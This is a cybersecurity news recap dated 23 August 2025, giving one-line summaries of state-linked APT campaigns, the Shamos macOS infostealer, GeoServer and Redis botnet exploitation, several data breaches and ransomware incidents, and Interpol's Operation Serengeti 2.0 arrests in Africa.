![Cybersecurity News | Daily Recap [23 Aug 2025]](https://www.hendryadrian.com/tweet/image/DailyRecap.png "Cybersecurity News | Daily Recap [23 Aug 2025]")
This cybersecurity recap highlights the ongoing activities of state-linked APT groups such as Murky Panda, Silk Typhoon, and APT36, which employ supply-chain tactics and zero-day exploits against SaaS providers and government targets. Additionally, it covers recent malware campaigns involving GeoServer, Redis, Shamos, and cybercrime law enforcement efforts across Africa. #MurkyPanda #SilkTyphoon #APT36 #GeoServer #Shamos #Interpol
State-linked APTs
- China-linked actors are abusing trusted cloud relationships and zero-days to attack SaaS providers and downstream customers, using supply-chain tactics and SOHO device masking — Murky Panda, Silk Typhoon, SharePoint PoC
- Pakistani APT APT36 is abusing Linux
.desktopfiles to deliver persistent espionage malware disguised as PDFs against Indian government and defense targets — APT36 Linux
Malware & Botnets
- Researchers warn of campaigns exploiting known flaws to weaponize GeoServer, Redis and IoT devices for botnets, proxies, and crypto-mining using malware like PolarEdge, Gayfemboy and TA-NATALSTATUS (incl. CVE-2024-36401) — GeoServer Exploits
- macOS users are being lured by fake “fix” guides into installing the new Shamos infostealer (developer: COOKIE SPIDER), which steals credentials, wallets and browser data and has hit 300+ environments since June 2025 — Shamos Infostealer
Data Breaches & Ransomware
- UK criminal-background checker APCS suffered a breach via third‑party developer Intradev, exposing passports, driving licences and NI details and raising supply‑chain data-security concerns — APCS Breach
- An IT staffing firm notified 34K people that SSNs and personal data were leaked after a July 2024 breach claimed by ransomware group Play — Computer Merchant
- Michigan’s Aspire Rural Health System disclosed a ransomware incident (claimed by BianLian) that exposed medical and financial records of over 138K patients, underscoring ongoing healthcare targeting — Aspire Breach
Law Enforcement & Defense
- Interpol’s Operation Serengeti 2.0 led to arrests of over 1,200 suspects across 18 African countries and the UK and the recovery of nearly $97.4 million by dismantling crypto scams, mining centers and fraud networks — Interpol Crackdown
- Recent roundup highlights major prison sentences for cybercriminals and defensive improvements such as PyPI domain monitoring that strengthen supply-chain protections — Weekly Roundup